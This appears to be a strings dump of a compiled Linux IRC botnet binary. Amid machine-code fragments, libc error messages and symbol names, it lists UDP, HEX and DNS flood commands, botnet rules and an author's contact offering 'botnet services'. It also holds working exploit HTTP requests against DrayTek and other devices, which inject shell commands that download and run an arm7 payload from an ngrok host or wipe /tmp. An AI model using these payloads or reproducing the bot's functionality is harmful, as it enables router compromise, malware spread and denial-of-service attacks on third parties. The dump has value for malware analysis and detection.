0s(H
<du{H
0s(H
<xu{H
0s(H
<Xu{H
0s(H
<uu{H
0s(H
0s(H
AVAUATSH
 [A\A]A^
ATSH
 [A\
< t.H
hostf
 pidf
/prof
D$ H
D$ H
T$0t$H
D$ H
AUATI
[]A\A]
L$8H
D$@L
L$HH
D$ H
AVAUI
d$ L
d$(H
H9D$
[]A\A]A^A_
t<H9k
t$,1
0[]A\
HcD$,H
+D$,H
D$,9D$(t
AVAUATS
X[A\A]A^
ZYH)
AUE1
^[]A\L
A]A^A_
AWAVAUATUH
d$0H
|$ L
\$0H
T$ H
T$ H
\$0H
|$0H
L$ZH
t$P1
HcT$,
t$DH
D$HA
L$8H
<$0u.A
|$ H
D$8H
D$8H
D$<E1
D$,A
|$ Ic
t$ Ic
|$ H
T$ H
T$ H
u8H)
|$ Ic
\$0H
D$,H
[]A\A]A^A_
D;G 
AWAVAUI
ATUSH
|$8~
:*u9E
@HcD$
HcD$
IcU H
t$HI
D$PH)
X[]A\A]A^A_
ATUH
[]A\
ATUH
[]A\A]A^
H;E(s
Z[]A\L
H;F0s
t@H;C
AUATI
A\L9
Z[]A\A]
 x5ff
sYH1
s?H1
s%H1
s~I1
s]I1
s<I1
szI1
sYI1
s8I1
sYH1
s?H1
s%H1
AUATUSH
t]r@H
_(tr
Z[]A\A]L
A^A_
u0Hc
|$11
[]A\A]
[]A\
[]A\
AY[H
[]A\H
AVAUI
ATUSH
|$0H
t$(L
D$ L
L$ I
T$(H
|$0L
t$0H
T$8H
L$8I
D$(H
T$8H
L$ H
|$0L
L$@L
l$hL
t$pH
HcL$TH
T$xH
HcD$TH
D$xL
T$THc
D$xI
D$xI
t$@L
D$(H
T$8H
D$(H
L$ H
[]A\A]A^A_
AVAUATUSH
F H9
L#d$
*H#D$
twL)
H;L$
[]A\A]A^A_
AWAVAUATUH
@ H9
G v%H
9L;d$
[]A\A]A^A_
ATUSH
E`I9
E`I)
Z[]A\A]
ATUSH
uEH9J
H;s`t\B
Y[]A\A]
uHH9y
H;5M
HcD$,H
ATSH
[A\A]
ATSH
[A\A]A^A_
([A\
wUHc
N t"
>tvD
HcE H
Y^[]
ATUH
_[]A\A]
AVAUATU
 <xu
"wsLc
D#l$
[]A\A]A^A_H
ATUSH
[]A\A]
tFH;
AUATA
[]A\A]
t$ H
AUATUH
@t	H
[]A\A]
Z[]1
L$8H
D$@L
L$HH)
D$ H
ATUH
t/H9
[]A\A]L
<rt<<w
t5<af
EPtmL
[]A\A]
tiI9
-H;z
]A\A]
Z[]L
A\A]
H9S u
-[]A\H
AUATI
u#z!
u=z;
D$(p
D$8 )A
D$@p
L$P|?Hc
D$`H
D$h#)A
D$HI
ftvE
D$0D+(H
T$ ~BA
[]A\A]A^A_
ATUH
[]A\A]A^
_8%0
AUE1
ATUSH
[]A\A]
H;G(
H9C uD
 x,H
@87u
tT@8q
tp@8q
t2@8q
t(@8q
@80t
tO@8q
tk@8q
ta@8q
tW@8q
tM@8q
tC@8q
t9@8q
t/@81u
@80t
[]A\
.u1H
 t!A
AWAVAUATUL
T$ H
D$LA
D$LH
t$ H
D$8;
HcD$8H
D$,x(
|$,H
|$,B
T$,H
|$,1
T$L9
9\$8}
\$PD
D$Dy
D$xH
E8HcE
E8H;E0wrH
9T$Xu*
;D$d
t$hH
D$H;
9\$8}
l$,D
[]A\A]A^A_
AUATUSH
[]A\A]A^
D$ L
AUATA
t$(v
t$(H
t$(D
[]A\A]
G +G
@87u
tN@8q
t2@8q
t(@8q
AWAVAUATI
|$ 1
<$:H
8[]A\A]A^A_
ATE1
A0<0
<t)A
 []A\
AUATUSH
[]A\A]A^A_
[]A\
AWAVI
[]A\A]A^A_
AVAUM
ATUSL
kTL9
T$@L
d$(L
|$8H
l$@H
T$ H
D$ H
T$(H
D$8H
T$0H
D$8I
L$@E1
T$ H
T$0H
|$@D
[]A\A]A^A_
suH1
s`H1
uUL1
sBH1
s-H1
u"L1
AUATI
Z[]A\A]A^A_
AUE1
ATUSH
u"Hc
D;d$
46Hc
[]A\A]A^A_
178.32.148.5
gethostbyname
NOTICE %s :unable to comply
PRIVMSG %s :unable to resolve %s
8.8.8.8
/proc/net/route
	00000000	
(null)
%s : USERID : UNIX : %s
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
PRIVMSG %s :Usage: !* UDP <host> <port> <time> 32 1024 10
PRIVMSG %s :attack has been started on %s
PRIVMSG %s :Usage: !* HEX <host> <port> <time> 1024
PRIVMSG %s :Usage: !* DNS <host> <port> <time>
PRIVMSG %s :[XTC] # # # # # # # # # # D D O S - C O M M A N D S # # # # # # # # # #
PRIVMSG %s :[XTC] !* UDP <host> <port> <time> 32 <packetsize> 10 - UDP FLOOD
PRIVMSG %s :[XTC] !* HEX <host> <port> <time> <packetsize>	- HEX FLOOD
PRIVMSG %s :[XTC] !* DNS <host> <port> <time> - DNS FLOOD
PRIVMSG %s :[XTC] # # # # # # # # # # O T H E R - C O M M A N D S # # # # # # # # #
PRIVMSG %s :[XTC] !* HELP - COMMAND HELP
PRIVMSG %s :[XTC] !* RULES - BOTNET RULES
PRIVMSG %s :[XTC] !* INFO - ABOUT THE BOT
PRIVMSG %s :[XTC] # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
PRIVMSG %s :[XTC] # # # # # # # # # # B O T N E T - R U L E S # # # # # # # # # # #
PRIVMSG %s :[XTC] 1. do not spam attacks
PRIVMSG %s :[XTC] 2. do not share this irc server
PRIVMSG %s :[XTC] 3. do not attack this irc server
PRIVMSG %s :[XTC] 4. do not start multible scanners per once
PRIVMSG %s :[XTC] 5. do not hit any type of goverments
PRIVMSG %s :[XTC] 6. respect all other customers
PRIVMSG %s :[XTC] 7. respect the botnet administrators
PRIVMSG %s :[XTC] # # # # # # # # # # A B O U T - T H E - B O T # # # # # # # # # #
PRIVMSG %s :[XTC] weapomized ddos malware includes powerfull ddos methods
PRIVMSG %s :[XTC] who bypass the most firewalls. advanched bot killer to destroy
PRIVMSG %s :[XTC] all most common mirai, qbot, kaiten bot proccesses
PRIVMSG %s :[XTC] fast selfreplication on every infected bot without raw socket.
PRIVMSG %s :[XTC] developed and completed by viktor sanchez. contact me on
PRIVMSG %s :[XTC] jabber under pabloescobar@xmpp.si for botnet services.
HELP
RULES
INFO
IRC 
POPPINSHELLZ 
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s
MODE %s -x
JOIN %s :%s
WHO %s
PONG %s
PRIVMSG
PING
NICK
/dev/null
#hellroom
NICK %s
USER %s localhost localhost :%s
ERROR
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a HTTP/1.1
POST /cgi HTTP/1.0
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`rm${IFS}-rf${IFS}/tmp/*`;`
POST /cgi HTTP/1.1
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`rm${IFS}-rf${IFS}/tmp/*`;`
POST /cgi HTTP/1.0
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`wget${IFS}http://19ce033f.ngrok.io/arm7${IFS}-O${IFS}/tmp/upnp.debug_01;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug_01;${IFS}/tmp/upnp.debug_01`;`
POST /cgi HTTP/1.1
Accept: application/json
Content-Type: application/json
admin' or 1=1--`;`wget${IFS}http://19ce033f.ngrok.io/arm7${IFS}-O${IFS}/tmp/upnp.debug_02;${IFS}chmod${IFS}777${IFS}/tmp/upnp.debug_02;${IFS}/tmp/upnp.debug_02`;`
 bin: 
/exe
/bin/sh
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/dev/null
L(knN
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.data
.bss
.comment
libc/sysdeps/linux/x86_64/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2761
p.2759
__do_global_dtors_aux
object.2814
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/x86_64/crtn.S
libc/sysdeps/linux/x86_64/crt1.S
bot.c
textBuffer.4987
i.5067
i.5159
printchar
prints
printi
print
checksum.c
draytek.c
draytek_get_random_ip
draytek_setup_connection
rand.c
resolv.c
resolv_skip_name
table.c
add_entry
toggle_obf
ucm.c
ucm_get_random_ip
ucm_setup_connection
util.c
util_isspace
util_isdigit
util_isalpha
util_isupper
__syscall_fcntl.c
_exit.c
close.c
fork.c
getpid.c
getppid.c
ioctl.c
kill.c
open.c
read.c
select.c
time.c
waitpid.c
write.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
clock.c
puts.c
vsprintf.c
sprintf.c
vsnprintf.c
popen.c
mylock
popen_list
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4280
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4493
prefix.4494
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.4493
qual_chars.4498
spec_chars.4494
spec_ranges.4495
spec_or_mask.4496
spec_and_mask.4497
feof.c
fgets.c
fgets_unlocked.c
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
libc/string/x86_64/memcpy.S
libc/string/x86_64/memset.S
libc/string/x86_64/strcat.S
libc/string/x86_64/strcpy.S
libc/string/x86_64/strlen.S
memmove.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.2050
_string_syserrmsgs.c
bcopy.c
strcasecmp.c
strdup.c
strtok.c
next_start.1440
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.3093
inet_ntoa.c
buf.2989
inet_makeaddr.c
gethostbyname.c
buf.5285
h.5284
gethostbyname_r.c
accept.c
bind.c
connect.c
getsockname.c
getsockopt.c
listen.c
recv.c
recvfrom.c
send.c
sendto.c
setsockopt.c
socket.c
malloc.c
__malloc_largebin_index
calloc.c
realloc.c
free.c
__malloc_trim
abort.c
been_there_done_that
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atoi.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3160
sigaction.c
__restore_rt
mmap.c
libc/sysdeps/linux/x86_64/vfork.S
clock_getres.c
dup2.c
execve.c
getdtablesize.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getrlimit.c
getuid.c
mremap.c
munmap.c
nanosleep.c
pipe.c
sbrk.c
sigprocmask.c
times.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fclose.c
fdopen.c
fprintf.c
_WRITE.c
_fopen.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
vfprintf.c
fflush_unlocked.c
fgetc_unlocked.c
libc/string/x86_64/mempcpy.S
memchr.c
memrchr.c
strtok_r.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
sigsetops.c
dl-support.c
brk.c
__syscall_error.c
poll.c
fopen.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
libc/string/x86_64/strcmp.S
libc/string/x86_64/strpbrk.S
libc/string/x86_64/strspn.S
rawmemchr.c
strncat.c
ntop.c
inet_pton4
xdigits.3747
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
lseek.c
tolower.c
libc/string/x86_64/strchr.S
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
__GI___ctype_b
__GI_memchr
dispass
__GI___glibc_strerror_r
waitpid
conn_table
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
_352
getgid
popen
sysconf
stdout
vsprintf
random
__GI_getpagesize
__GI_strdup
draytek_scanner_kill
command_hex
getdtablesize
__GI_h_errno
Send
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
putc_unlocked
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
__pthread_mutex_lock
command_rules
__sigdelset
util_stristr
identd
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
draytek_recv_strip_null
memmove
pclose
__GI_strpbrk
sendbacktoHost
table_key2
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getc_unlocked
times
ident
servers
__ctype_b
strtoimax
__GI_random_r
resolv_domain_to_hostname
errno
getegid
__GI_sbrk
__libc_accept
__GI___uClibc_init
nick
execve
getpagesize
getpid
util_strncmp
localAddr
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
util_fdgets
__xpg_strerror_r
fcntl64
mfork
getrlimit64
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
ucm_fake_time
__GI_fgets
creat
rand_init
_stdio_openlist_dec_use
__libc_select
_ppfs_init
puts
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
sock
trim
table_key5
dup2
__GI_fgets_unlocked
__pthread_mutex_init
tolower
getuid
util_strcat
__open_etc_hosts
feof
malloc
isatty
table_unlock_val
sleep
__GI_atol
strtoll
vsnprintf
__dns_lookup
__GI_read
recvfrom
__C_ctype_tolower
resolvehttp
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_accept
watchdog_pid
__stdio_seek
mempcpy
__GI_strcoll
util_atoi
__GI_write
util_memsearch
__ctype_toupper
__libc_read
_string_syserrmsgs
disabled
__GI_herror
__GI_open
__GI_strchr
__searchdomain
lseek
__GI_tcgetattr
__environ
mmap
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
getspoof
__GI_fcntl
ucm_rsck
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
__GI_inet_ntoa_r
__GI_setstate_r
strtol
pipe
draytek_scanner_rawpkt
__libc_lseek64
strnlen
rawmemchr
draytek_rsck_out
__GI_mempcpy
accept
__malloc_state
user
__GI___C_ctype_b_data
resolv_lookup
table
execfile
__sigaddset
nanosleep
__GI_send
h_errno
calloc
command_udp
server
__pthread_mutex_unlock
wait4
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
spoofs
environ
__GI_close
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
strcat
__GI_brk
__GI_strcat
bind
__GI_nanosleep
_376
__GI_strtok
LOCAL_ADDR
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
table_key3
__GI_fseek
__deregister_frame_info
ourIP
util_strlen
util_zero
fseeko
_stdio_openlist_del_count
makestring
__raise
setsockopt
spoofsm
ucm_scanner_rawpkt
__GI_times
fseek
mremap
__GI_kill
__GI_strcmp
ucm_recv_strip_null
__GI_memmove
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_start
strstr
__GI_ioctl
init_rand
rand
read
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
table_retrieve_val
makeRandomShit
util_local_addr2
wcsrtombs
_stdio_user_locking
filter
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
__GI___C_ctype_b
table_key
realloc
__GI_gethostbyname_r
__GI_strncpy
realrand
_PRIVMSG
__libc_send
__GI___xpg_strerror_r
__GI___C_ctype_tolower
__GI_recvfrom
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__GI___fputc_unlocked
draytek_rsck
listen
_NICK
__stdio_adjust_position
malloc_trim
fdopen
__GI_poll
_vfprintf_internal
fork
rand_next
table_key4
__stdio_rfill
strncat
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
__libc_close
strdup
__GI_getpid
inet_aton
util_memcpy
watchdog_maintain
index
_pthread_cleanup_push_defer
__sigismember
fopen
__bss_start
__libc_open
getOurIP
resolv_entries_free
command_help
memset
__GI_socket
main
__GI___libc_lseek
__glibc_strerror_r
util_local_addr
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
srand
table_lock_val
ucm_scanner_pid
initstate
fclose
ntohs
inet_ntoa
getppid
tcgetattr
__C_ctype_tolower_data
__libc_recvfrom
time
checksum_generic
ucm_scanner_init
__GI_abort
poll
draytek_fake_time
host2ip
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
herror
strcmp
__nameserver
data_start
__GI_sysconf
command_dns
__h_errno_location
__GI_putc_unlocked
__C_ctype_b_data
__GI_inet_pton
fd_serv
gethostbyname
_stdio_fopen
util_itoa
_fini
__vfork
__GI_mmap
sprintf
draytek_scanner_init
fdgets
strerror_r
__GI_select
__libc_waitpid
__GI_waitpid
__GI_vfprintf
_stdio_term
__decode_answer
numservers
stderr
vfork
__C_ctype_b
srandom
_ppfs_setargs
__GI_sendto
__libc_fork
command_info
changeservers
__atexit_lock
rand_cmwc
draytek_scanner_pid
__libc_lseek
util_strcmp
ucm_rsck_out
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
strwildmatch
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
rand__str
_edata
__stdout
udp_flood
filetoexe
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
__GI_listen
htons
util_strcpy
chan
_ppfs_prepargs
msgs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
checksum_tcpudp
inet_ntop
__C_ctype_toupper_data
stringsendtohost
_dl_aux_init
table_init
_errno
atoi
fd_ctrl
_stdio_openlist_del_lock
__GI_inet_aton
_PING
hex_flood
fgets_unlocked
__GI_bind
_exit
__GI_lseek
strspn
__GI_strtoll
__libc_recv
rand_alpha_str
exePath
__libc_creat
strlen
lseek64
open
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
atoll
__GI_strtol
__GI_getuid
clock
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
strchr
__GI_rawmemchr
__GI_raise
__data_start
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
fputc_unlocked
fcntl
flooders
__GI_fdopen
__GI_atoi
fseeko64
__GI_sprintf
ucm_scanner_kill
__ctype_tolower
__register_frame_info
wcrtomb
__GI_getsockname
close
__libc_connect
checksum_tcp_udp
__GI_strlen
pids
vfprintf
strpbrk
_433
_load_inttype
raise
free
sigprocmask
__fputc_unlocked
getsockname
